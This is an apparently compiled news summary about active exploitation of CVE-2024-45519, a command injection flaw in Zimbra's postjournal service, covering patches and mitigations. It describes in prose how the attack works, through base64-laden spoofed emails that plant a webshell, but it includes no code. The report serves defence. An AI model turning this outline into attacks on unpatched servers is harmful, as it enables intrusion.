Cybersecurity researchers have identified ongoing exploitation attempts targeting a critical vulnerability in Zimbra mail servers [6], known as CVE-2024-45519 [2] [3] [6].
Description
This vulnerability, an OS command injection flaw in Zimbra’s postjournal service [5], allows threat actors to execute arbitrary commands on affected systems without authentication. Attackers are leveraging this security flaw by sending emails containing base64 strings to be executed by Zimbra servers, aiming to establish a webshell on vulnerable installations. Once deployed, the webshell can execute commands or download and run files via a socket connection [4], posing a significant risk to affected systems. Zimbra has responded by releasing patches for versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1 [1] [6] [8], urging users to promptly install these updates or disable the postjournal service to mitigate the risk of exploitation. The vulnerability was initially discovered and reported by security researcher lebr0nli (Alan Li), emphasizing the importance of timely patch application to prevent potential security breaches [7]. Additionally, a critical security update has been issued by Zimbra to address the vulnerability in the postjournal service [7], introducing input sanitization measures to prevent unauthorized command execution [7]. Researchers have demonstrated the exploitability of this vulnerability using specific SMTP commands, underscoring the necessity of applying the latest security patch to safeguard against attacks. System administrators are advised to configure the mynetworks parameter correctly and promptly apply the provided patch, even if the postjournal feature is not enabled on their Zimbra systems [5]. Proofpoint researchers have observed ongoing attacks targeting this vulnerability [3], with attackers sending spoofed emails containing malicious code to exploit the flaw [3]. Patched versions of the software have addressed the issue [3], but administrators are urged to apply the latest patches promptly to prevent exploitation [3]. The attacks involve spoofed emails appearing to come from Gmail [6], with malicious addresses in the CC fields [6], aiming to execute arbitrary commands on affected installations [1] [4] [6] [7]. The vulnerability was addressed in recent Zimbra updates [6], released on September 4, 2024 [1] [6]. Security experts recommend applying the provided patches to prevent possible exploitation [6], or temporarily removing the postjournal binary if immediate patch application is not feasible [6]. The flaw allows attackers to inject arbitrary commands [5] [6] [7], emphasizing the critical need for users to implement comprehensive security measures to protect against these active threats [6]. Mitigation strategies include network segmentation [8], regular patching [8], monitoring [7] [8], user training [8], and backup and recovery [8]. Kudelski Security has not observed active exploitation of the vulnerability [8].
Conclusion
The ongoing exploitation attempts targeting the vulnerability in Zimbra mail servers highlight the importance of timely patch application and comprehensive security measures to protect against potential security breaches. System administrators are urged to apply the latest patches promptly to prevent exploitation and safeguard their systems against active threats.
References
[1] https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html
[2] https://arstechnica.com/security/2024/10/attackers-exploit-critical-vulnerability-recently-patched-in-zimbra-servers/
[3] https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now
[4] https://securityaffairs.com/169239/hacking/zimbra-postjournal-flaw-cve-2024-45519-exploited.html
[5] https://www.helpnetsecurity.com/2024/10/02/cve-2024-45519-exploited/
[6] https://cybermaterial.com/exploitation-targets-zimbra-postjournal-flaw/
[7] https://cybersecuritynews.com/zimbra-rce-vulnerability/
[8] https://research.kudelskisecurity.com/2024/10/02/security-advisory-cve-2024-45519/